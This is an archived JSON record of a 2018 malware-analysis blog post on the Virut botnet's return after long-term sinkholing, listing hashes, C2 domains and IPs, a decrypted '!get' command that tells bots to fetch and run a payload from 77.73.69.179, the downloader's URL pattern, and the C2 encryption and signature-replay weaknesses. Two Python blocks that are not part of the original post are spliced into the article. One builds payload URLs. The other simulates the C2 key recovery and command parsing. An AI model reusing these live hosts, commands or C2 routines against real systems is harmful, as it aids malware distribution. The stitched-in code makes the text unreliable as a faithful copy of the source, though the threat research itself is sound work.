{
	"id": "fd745088-c72e-4a11-9793-ee52c7192f18",
	"created_at": "2026-04-06T00:07:55.430225Z",
	"updated_at": "2026-04-10T03:21:19.543Z",
	"deleted_at": null,
	"sha1_hash": "f84d9419992fc2a016a96eff27bf250e5239cd5d",
	"title": "Virut Resurrects -- Musings on long-term sinkholing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 103460,
	"plain_text": "Virut Resurrects -- Musings on long-term sinkholing\r\nBy Christian J. Dietrich\r\nPublished: 2018-12-01 · Archived: 2026-04-05 16:42:39 UTC\r\nVirut is a botnet malware family that was first observed in 2006. Traditionally, it spreads as a file-infecting virus and has been monetized through pay-per-install schemes and information theft. Although believed by many to be dead following a major sinkholing operation conducted by NASK/CERT Polska in 2013, events over the last few months indicate an uptick in activity. Earlier in 2018, an unusual drive-by attack with a Chinese nexus involved dropping a Virut sample. Having dealt with takedowns before and tracked botnets, this piqued my interest.\r\nRecent activity\r\nFurther research shows that although the 2013 sinkholing of C2 domains ending in .pl, .at and .ru is still in place, some variants evade it and were actively distributing additional malware as of November 2018. Interestingly, the C2 protocol has not changed. A recent Virut binary has the SHA-256 hash 054eeaa9f120f3613cf06ad010c58adf025c4f8c03dcc6da6acd567be27e87aa and was first submitted to VirusTotal in November 2018. On 32-bit Windows, it injects code into the winlogon.exe process. To connect to the C2 server it uses the domain tbsgay[.]com, which at the time of analysis resolved to the IP address 148.251.79[.]206. The full set of hardcoded C2 domains in this sample is:\r\ntbsgay[.]com\r\nffiuli[.]com\r\nlexfal[.]com\r\nsexpsa[.]com\r\nvolmio[.]com\r\nOnce connected, the server instructs the bot to download and execute a PE file from http://77.73.69[.]179:9/mk/p0.php?a=31 . The decrypted C2 command is an IRC-style PRIVMSG whose trailing parameter carries the !get command; a hexdump of it looks as follows:\r\n0000 3A 75 2E 20 50 52 49 56 4D 53 47 20 62 6E 69 78 :u. PRIVMSG bnix\r\n0010 79 71 6C 7A 20 3A 21 67 65 74 20 68 74 74 70 3A yqlz :!get http:\r\n0020 2F 2F 37 37 2E 37 33 2E 36 39 2E 31 37 39 3A 39 //77.73.69.179:9\r\n0030 2F 6D 6B 2F 70 30 2E 70 68 70 3F 61 3D 33 31 0D /mk/p0.php?a=31.\r\n0040 0A .\r\nThe downloaded file (SHA-256 fb0852761cfb7bfa34be168452891d5849574254f8623192798f1c03c2777688) is tiny, just 4 KB in size, packed with UPX, and has a recent build timestamp of 2018-11-01 22:54:34 UTC. It acts as a downloader that retrieves further payloads via HTTP using the User-Agent AdInstall .\r\nhttps://chrisdietri.ch/post/virut-resurrects/\r\nPage 1 of 5\r\nThe URLs follow the pattern:\r\nhttp://77.73.69.179:9/mk/p%u.php?a=%u\r\nThe first %u is a counter, for which the values 1 and 2 were observed. Note that the initial download URL that Virut distributed follows the same pattern, with the counter value 0. The second %u is read from the last WORD of the reserved e_res2 array in the DOS header (offset 0x3a), immediately preceding the e_lfanew field. The downloader reads it from its own mapped image using\r\n*((_WORD *)GetModuleHandleA(0) + 0x1d)\r\n(the module handle is the image base, which begins with the DOS header, and 0x1d WORDs equals offset 0x3a); the value was observed to be 31 exclusively. Regular PE files leave e_res2 zeroed because it is unused, so a nonzero value is uncommon.
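Reading the tag and building the payload URLs, as an added example in Python (not code from the original post or from the malware). It models the DOS-header read against a constructed 64-byte header instead of a real Virut sample; the host, port and URL pattern are the ones from the post, while the helper names and the triage function are this example's own:

```python
import struct

# Offsets in IMAGE_DOS_HEADER (fixed by the PE format, not taken from the post).
E_RES2_OFFSET = 0x28     # WORD e_res2[10] spans 0x28..0x3B
E_LFANEW_OFFSET = 0x3C   # LONG e_lfanew follows directly
TAG_OFFSET = 0x3A        # last e_res2 element, 0x1D WORDs from the header start
assert TAG_OFFSET == 0x1D * 2 and E_RES2_OFFSET <= TAG_OFFSET < E_LFANEW_OFFSET

def build_dos_header(tag=0, lfanew=0x40):
    # Constructed minimal DOS header (assumption for illustration); only the
    # fields this example reads are meaningful, e_lfanew is a placeholder.
    hdr = bytearray(64)
    hdr[0:2] = b'MZ'
    struct.pack_into('<H', hdr, TAG_OFFSET, tag)
    struct.pack_into('<I', hdr, E_LFANEW_OFFSET, lfanew)
    return bytes(hdr)

def read_e_res2_tag(image):
    # Equivalent of *((_WORD *)GetModuleHandleA(0) + 0x1d) on a mapped image:
    # the module handle is the base address, and the image starts with the DOS header.
    if image[0:2] != b'MZ':
        raise ValueError('not a DOS/PE image')
    return struct.unpack_from('<H', image, TAG_OFFSET)[0]

def build_payload_url(counter, tag, host='77.73.69.179', port=9):
    # Fills the pattern http://77.73.69.179:9/mk/p%u.php?a=%u from the post.
    return 'http://%s:%d/mk/p%d.php?a=%d' % (host, port, counter, tag)

def payload_urls(image, counters=(1, 2)):
    # The downloader's follow-up requests: counter values 1 and 2 were observed.
    tag = read_e_res2_tag(image)
    return [build_payload_url(c, tag) for c in counters]

def nonzero_reserved_words(image):
    # Triage helper: regular PE files leave e_res2 zeroed, so any nonzero element
    # is an anomaly worth a look (not a Virut verdict on its own). Returns a map
    # of file offset -> value for the nonzero WORDs.
    words = struct.unpack_from('<10H', image, E_RES2_OFFSET)
    return {E_RES2_OFFSET + 2 * i: w for i, w in enumerate(words) if w}

if __name__ == '__main__':
    tagged = build_dos_header(tag=31)
    print(payload_urls(tagged))
    print(nonzero_reserved_words(tagged))
```

To run the check over a real file, pass the first 64 bytes of it (open(path, 'rb').read(64)) to read_e_res2_tag or nonzero_reserved_words; on disk the DOS header has the same layout as in memory.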
The purpose of retrieving this value is unclear, but it could be an attempt by the operator to ensure that further samples are only downloaded by previously distributed samples. However, even with the second parameter set to 0, the payload is served.\r\nThe downloads yield two payload files:\r\n6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96 p0.php?a=31\r\n |\r\n +- 781c12e2ab1c08d885c002eee8ef9c03e92c9c196fe5a576399080d10fbaa693 p2.php?a=31\r\n |    +-- build timestamp 2018-11-02 13:47:52 UTC\r\n |\r\n +- 6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96 p1.php?a=31\r\n      +-- build timestamp 2018-11-29 21:54:49 UTC\r\nThese files are associated with malicious activities described by Fortinet, based on a common user agent string, Medunja Solodunnja 6.0.0 , that is used in subsequent C2 communication with the host static.76.102.69.159.clients.your-server[.]de (resolving to 159.69.102[.]76). The Fortinet researchers suspect a Ukrainian nexus for the payload files, based on a cookie maker in Lviv, Ukraine, with the same name as the user agent, and on domain registration data. It is unclear, though, whether the payload is operated by the same entity as the Virut activity. In 2013, Brian Krebs mentioned research by Team Furry which suggests a possible Polish nexus of the Virut operators.\r\nLooking back\r\nBefore the sinkholing in 2013, Virut often ranked in the malware-family top ten, which by itself justified regular scrutiny. With the sinkholing in place, it may have disappeared from people’s radar. How and when did Virut come back to life?\r\nPivoting off the indicators above, Virut appears to have resumed its activity slowly over the last year. Although at lower volume, active C2 servers have appeared intermittently since the end of 2017.
For example, the IP address 77.73.69[.]179 was observed in a likely Virut execution in February 2018 and as part of the Virut C2 command http://77.73.69[.]179:9/mk/li.jpg at the end of 2017.\r\nSimilarly, the Virut C2 at 148.251.79[.]206 appears to have operated since late 2017, with notably increased activity in November 2018.\r\nAnother interesting case is the Virut C2 domain gik.alr4[.]ru. It issued commands in early 2013 while resolving to 178.132.202[.]196. At the end of January 2013 it was sinkholed and resolved to 148.81.111.111, the IP address of the CERT.PL sinkhole at the time. Fast forward to October 2018, and the domain points to a C2 server (212.109.221[.]97) issuing the command !get http://77.73.69[.]179:9/mk/p0.php?a=31 .\r\nA bit of Virut history\r\nProbably one of the first technical descriptions of Virut was published by Joe Stewart in 2009, motivated by a shift from a plaintext C2 protocol to encrypted C2. His report details an interesting trick in Virut’s C2 encryption: the 4-byte session key is chosen pseudorandomly by each bot and never transmitted to the C2 server, so the server is left to recover it with a known-plaintext attack. Since the underlying IRC-like protocol places the string NICK at the start of the first message, that string serves as the known plaintext that reveals the key. Once recovered, the session key is used to decrypt the remainder of the request as well as to encrypt the responses towards the bot.\r\nThe following timeline highlights notable developments.\r\nTo increase resilience and impede sinkholing, Virut contains a date-seeded domain generation algorithm (DGA) that generates up to 10,000 domains per day of the form [a-z]{6}.com . Daniel Plohmann and others documented that Virut’s DGA is particularly prone to collisions with unrelated, legitimately registered domains, because of the short domain length and the high number of generated domains.
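Returning to the C2 protocol itself: the key-recovery trick described above and the !get PRIVMSG from the hexdump in the Recent activity section, as an added example in Python (not code from the original post, from Joe Stewart's report, or from the malware). The cipher is a deliberately simplified stand-in, a 4-byte key XORed repeatedly over the data, chosen so that the known plaintext NICK at the start of the bot's first message yields the key directly; Virut's actual keystream is not reproduced here. The C2 command bytes are copied from the hexdump above and the nick bnixyqlz comes from the same dump; the function names are this example's own:

```python
import os

# Decrypted C2 command, bytes copied from the hexdump in the post.
C2_COMMAND = bytes.fromhex(
    '3A 75 2E 20 50 52 49 56 4D 53 47 20 62 6E 69 78 '
    '79 71 6C 7A 20 3A 21 67 65 74 20 68 74 74 70 3A '
    '2F 2F 37 37 2E 37 33 2E 36 39 2E 31 37 39 3A 39 '
    '2F 6D 6B 2F 70 30 2E 70 68 70 3F 61 3D 33 31 0D '
    '0A'
)
BOT_NICK = 'bnixyqlz'

def xor_stream(data, key):
    # Toy cipher standing in for Virut's real one (assumption for illustration):
    # the 4-byte session key is simply repeated over the data. What the attack
    # needs is only that the first keystream bytes are a direct function of the key.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def bot_login(key, nick=BOT_NICK):
    # Bot side: the first message of the IRC-like protocol starts with NICK and
    # is encrypted under a session key the bot never sends to the server.
    plaintext = ('NICK %s' % nick).encode() + bytes.fromhex('0d0a')
    return xor_stream(plaintext, key)

def recover_session_key(ciphertext):
    # Server side known-plaintext attack: the first four plaintext bytes are
    # known to be NICK, so XOR-ing them with the first four ciphertext bytes
    # yields the 4-byte key without any key exchange.
    if len(ciphertext) < 4:
        raise ValueError('need at least 4 ciphertext bytes')
    return bytes(c ^ p for c, p in zip(ciphertext[:4], b'NICK'))

def parse_get_command(line):
    # Parse an IRC-style line of the form
    #   :<prefix> PRIVMSG <target> :!get <url>
    # and return (target, url); anything else yields None.
    text = line.decode('latin-1').rstrip()
    head, sep, trailing = text.partition(' :')
    if not sep:
        return None
    parts = head.split()
    if parts and parts[0].startswith(':'):
        parts = parts[1:]   # drop the sender prefix (':u.' in the dump)
    if len(parts) < 2 or parts[0] != 'PRIVMSG':
        return None
    if not trailing.startswith('!get '):
        return None
    return parts[1], trailing[5:].strip()

def c2_exchange(session_key, command=C2_COMMAND):
    # Full exchange: the bot logs in, the server recovers the key from the login
    # message, decrypts the request and encrypts its command under the same key,
    # and the bot decrypts and parses it. Returns (key_recovered_ok, parsed_command).
    login_ct = bot_login(session_key)
    recovered = recover_session_key(login_ct)
    request = xor_stream(login_ct, recovered)         # server reads the request
    response_ct = xor_stream(command, recovered)      # server encrypts its command
    decrypted = xor_stream(response_ct, session_key)  # bot decrypts with its own key
    ok = recovered == session_key and request.startswith(b'NICK ')
    return ok, parse_get_command(decrypted)

if __name__ == '__main__':
    print(c2_exchange(os.urandom(4)))
```

The same parser is what a sinkhole or tracker would run over decrypted traffic to pull download URLs out of !get commands; the key recovery step shows why the server never needs the bot to send its key, and also why anyone who can observe the first message can decrypt the session.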
The recent sample still contains the DGA. However, the DGA domains do not appear to have been needed to establish C2 communication, since the hardcoded domains were resolvable.\r\nTo prevent hijacking of the C2 channel, an RSA signature verification step was introduced. A valid Virut C2 server must provide a signed SHA-256 hash of the C2 domain, and the bot verifies the signature before accepting commands. Because the signed value covers only the domain name and carries no per-session nonce or timestamp, a signature captured from a live C2 server can be replayed by anyone who later controls that domain, so the step is vulnerable to a replay attack; it was most likely intended to gracefully handle accidental collisions between a DGA-generated domain and a completely unrelated domain. Nicolas Falliere documented this in August 2011. The same 2048-bit RSA modulus is still used in the current sample:\r\n# RSA modulus\r\n57 06 4C EC 3B 33 66 6C B5 DD 54 B5 71 4E 78 86\r\n42 50 FE 33 14 6B 02 60 0F 27 AA 81 71 AD C2 8B\r\n0B 57 39 4D 30 D0 8A 98 4D 6F 64 82 5C C9 51 49\r\n83 C0 5E 43 3E 88 ED 6D 38 01 68 19 42 4C AA 61\r\n59 DF 28 99 DA 63 3B 6C 0A C5 90 06 39 93 3F 5E\r\nF6 75 67 37 DA F5 79 07 63 9F 7A D3 D5 AB 84 BE\r\n61 C0 5C 43 16 B6 7A 79 F2 72 76 D9 74 CF C3 2B\r\nDB 61 43 34 72 3E 4B 34 9B 2D 77 09 A0 0E 80 52\r\n20 F5 73 CF BC 0F EF 8C 09 EB 3B FA A3 8F 87 8A\r\nCF D2 4A 19 74 9D C5 FD 9E E3 DE 55 8E BE C1 B6\r\nE8 B6 E6 4B 29 90 73 FC 0D 77 59 2C D2 95 C2 16\r\nE2 CB 35 19 E5 6B DB ED 72 4D 92 45 F1 9A 99 1C\r\n3D 24 38 38 D7 D8 77 4F 74 1B 82 0A 00 CF F7 2A\r\nD8 CD E6 F3 05 FA 65 CE 08 8D 28 2F 39 C6 F3 E9\r\nF2 89 8F 4C C5 8C 11 AA 2A AA 69 19 3C 95 70 05\r\n4C F9 BD 36 CD 60 20 FD AC 92 6A 1B 3B 7C 4B BB\r\nA note on byte order: interpreted big-endian, the leading byte 0x57 yields a 2047-bit integer, whereas interpreted little-endian (the layout used, for instance, by Windows CryptoAPI public key blobs) the high byte 0xBB yields exactly 2048 bits. Either way, a modulus that has stayed the same across years is a stable fingerprint for matching Virut samples.\r\nConclusion\r\nRecovering after a multi-year slow-down seems to be an attractive option for botnet operators. Malware researchers who tracked such a botnet in the past may have shifted focus or even moved on to other topics.
In addition, an uptick in activity may go unnoticed with sinkholing in place unless it is carefully inspected.\r\nNo question, sinkholing botnets is tough, and many parties are doing a great job at it. Sustaining a sinkholing effort is even harder, especially if it is not paralleled by law enforcement action. Although sinkholing imposes additional cost on the adversary, a patient operator may withstand it. In the end, sinkholing a botnet of a certain impact is certainly useful and necessary. It seems that, in addition to identifying and countering new threats, the anti-malware community may also need to monitor contained threats on a long-term basis.\r\nIndicators\r\nThe following is a summary of the indicators mentioned above.\r\n054eeaa9f120f3613cf06ad010c58adf025c4f8c03dcc6da6acd567be27e87aa\r\nfb0852761cfb7bfa34be168452891d5849574254f8623192798f1c03c2777688\r\n781c12e2ab1c08d885c002eee8ef9c03e92c9c196fe5a576399080d10fbaa693\r\n6dadd08b523be5bc41162cd4ca35afabd4c847733ad8df88362de1ee3b383e96\r\ntbsgay.com\r\nffiuli.com\r\nlexfal.com\r\nsexpsa.com\r\nvolmio.com\r\n148.251.79.206\r\n77.73.69.179\r\nstatic.76.102.69.159.clients.your-server.de\r\n159.69.102.76\r\ngik.alr4.ru\r\n212.109.221.97\r\nA related sample execution can be found here.\r\nSource: https://chrisdietri.ch/post/virut-resurrects/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://chrisdietri.ch/post/virut-resurrects/"
	],
	"report_names": [
		"virut-resurrects"
	],
	"threat_actors": [],
	"ts_created_at": 1775434075,
	"ts_updated_at": 1775791279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.pdf",
		"text": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.txt",
		"img": "https://archive.orkl.eu/f84d9419992fc2a016a96eff27bf250e5239cd5d.jpg"
	}
}